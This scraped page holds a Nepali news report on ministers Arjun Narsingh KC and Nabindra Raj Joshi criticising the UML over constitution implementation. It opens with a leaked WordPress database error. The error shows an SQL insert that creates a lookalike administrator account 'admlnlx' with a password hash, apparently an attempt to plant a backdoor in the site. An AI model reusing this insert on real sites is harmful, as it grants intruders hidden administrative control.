WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQoMR.jY/d46sToac0/5z7QcsrjLvH.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 10:13:23', '', 'admlnlx', 'admlnlx')
चितवन,पुस ९ –
सहरी विकासमन्त्री अर्जुन नरसिंह केसीले राष्ट्रिय महत्त्व र निर्वाचन सम्बन्धि विषयहरुलाई संसद प्रवेश गर्न नदिएर एमालेले घोर अलोकतान्त्रिक चरित्र प्रदर्शन गरेको बताउनुभएको छ ।
शनिबार नेपाली कांग्रेस चितवनले आयोजना गरेको कार्यकर्ता भेटघाटलाई सम्बोधन गर्दै मन्त्री केसीले मुलुकसामु संविधान कार्यान्वयनको कुनै विकल्प नरहेका बेला कार्यान्वयनलाई सरकारको मात्र दायित्व ठान्नु गलत रहेको बताउनुभयो ।
त्यसक्रममा मन्त्री केसीले पार्टीभित्र कसैको पक्षपोषण भन्दा पनि संस्थागत विकासमा जोड दिने प्रवृत्ति बिकसित हुनुपर्नेमा समेत जोड दिनुभयो ।
कार्यक्रममा उद्योगमन्त्री नबिन्द्रराज जोशीले संविधान कार्यान्वयनको दायित्व पूरा गर्न सरकार जिम्मेवार रहेको बताउँदै पार्टीगत आग्रहका आधारमा संविधान कार्यान्वयनलाई हेरिनु दुःखद रहेको बताउनुभयो ।